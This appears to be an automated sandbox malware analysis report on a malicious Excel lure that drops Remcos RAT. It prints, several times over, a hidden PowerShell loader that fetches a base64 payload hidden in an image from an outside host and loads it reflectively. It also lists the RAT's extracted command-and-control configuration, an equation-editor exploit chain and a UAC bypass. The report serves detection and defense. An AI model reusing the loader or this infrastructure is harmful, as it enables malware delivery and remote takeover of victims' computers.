                Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3368, Protocol: tcp, SourceIp: 88.99.66.38, SourceIsIpv6: false, SourcePort: 443
                Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ?
                Sigma detected: Usage Of Web Request Commands And Cmdlets
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ?
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3368, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs" , ProcessId: 4056, ProcessName: wscript.exe
                Sigma detected: Modification of IE Registry Settings
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3368, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
                Sigma detected: Office Macro File Creation
                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3672, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3084, TargetFilename: C:\Users\user\AppData\Local\Temp\ru3ofdm4.k0x.ps1

                Data Obfuscation

                barindex
                Sigma detected: Powershell download and load assembly
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ?

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: Registry Key setAuthor: Joe Security: Data: Details: 77 A9 80 9E 90 2C B8 6C 51 BA A5 B2 8E A0 16 C7 79 D0 CC 92 08 78 EC 20 68 CF E2 8F A1 4B DE A4 4E 3B 44 07 84 89 BB 52 B7 F6 66 B9 84 EE 49 49 A7 72 B3 8C 9D E0 39 B5 2D C9 20 F9 BF 26 10 6C 21 F5 FC 78 E6 40 52 82 2A 39 1D 19 F1 FC 37 85 40 FD 38 55 FE 96 C3 B0 43 02 77 EB 3D 1C 38 07 1B 75 19 AC EF 04 FA 29 66 07 FE 4F 4E D5 08 7D 33 BA , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 2780, TargetObject: HKEY_CURRENT_USER\Software\Rmc-R2I0JW\exepath

                Suricata Signatures

                Timestamp:2024-08-28T06:54:12.164040+0200
                SID:2049038
                Severity:1
                Source Port:443
                Destination Port:49171
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-08-28T06:54:14.551269+0200
                SID:2036594
                Severity:1
                Source Port:49173
                Destination Port:14645
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-08-28T06:54:13.540932+0200
                SID:2020423
                Severity:1
                Source Port:80
                Destination Port:49172
                Protocol:TCP
                Classtype:Exploit Kit Activity Detected
                Timestamp:2024-08-28T06:54:13.540932+0200
                SID:2020424
                Severity:1
                Source Port:80
                Destination Port:49172
                Protocol:TCP
                Classtype:Exploit Kit Activity Detected
                Timestamp:2024-08-28T06:54:16.039220+0200
                SID:2036594
                Severity:1
                Source Port:49174
                Destination Port:14645
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-08-28T06:54:16.039220+0200
                SID:2803304
                Severity:3
                Source Port:49175
                Destination Port:80
                Protocol:TCP
                Classtype:Unknown Traffic

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpgURL Reputation: Label: malware
                Source: 2024remcmon.duckdns.orgAvira URL Cloud: Label: malware
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{03652721-936B-412E-9DA4-9599756B16B0}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFA95D3F.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
                Found malware configuration
                Source: 0000000E.00000002.620697128.0000000000541000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "2024remcmon.duckdns.org:14645:1", "Assigned name": "zynova", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-R2I0JW", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Multi AV Scanner detection for domain / URL
                Source: 2024remcmon.duckdns.orgVirustotal: Detection: 15%Perma Link
                Source: http://107.172.31.21/xampp/nbc/un/sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret.docVirustotal: Detection: 6%Perma Link
                Source: 2024remcmon.duckdns.orgVirustotal: Detection: 15%Perma Link
                Multi AV Scanner detection for submitted file
                Source: RFQ No. 109078906v.xla.xlsxVirustotal: Detection: 21%Perma Link
                Yara detected Remcos RAT
                Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.powershell.exe.41beb20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.powershell.exe.41beb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.620697128.0000000000525000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.620697128.0000000000541000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.512511300.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2772, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2780, type: MEMORYSTR
                Machine Learning detection for sample
                Source: RFQ No. 109078906v.xla.xlsxJoe Sandbox ML: detected
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,14_2_00433837
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404423 FreeLibrary,CryptUnprotectData,15_2_00404423
                Source: powershell.exe, 0000000D.00000002.512511300.0000000003E99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_6c6043c1-a

                Exploits

                barindex
                Yara detected UAC Bypass using CMSTP
                Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.powershell.exe.41beb20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.powershell.exe.41beb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.512511300.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2772, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2780, type: MEMORYSTR
                Office equation editor establishes network connection
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 107.172.31.21 Port: 80Jump to behavior
                Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
                Source: ~WRF{03652721-936B-412E-9DA4-9599756B16B0}.tmp.4.drStream path '_1786311594/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: ~WRF{03652721-936B-412E-9DA4-9599756B16B0}.tmp.4.drStream path '_1786311600/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                Privilege Escalation

                barindex
                Contains functionality to bypass UAC (CMSTPLUA)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004074FD _wcslen,CoGetObject,14_2_004074FD
                Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49164 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49165 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 192.168.2.22:49165 -> 88.99.66.38:443 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49166 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49171 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49161 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49163 version: TLS 1.2
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
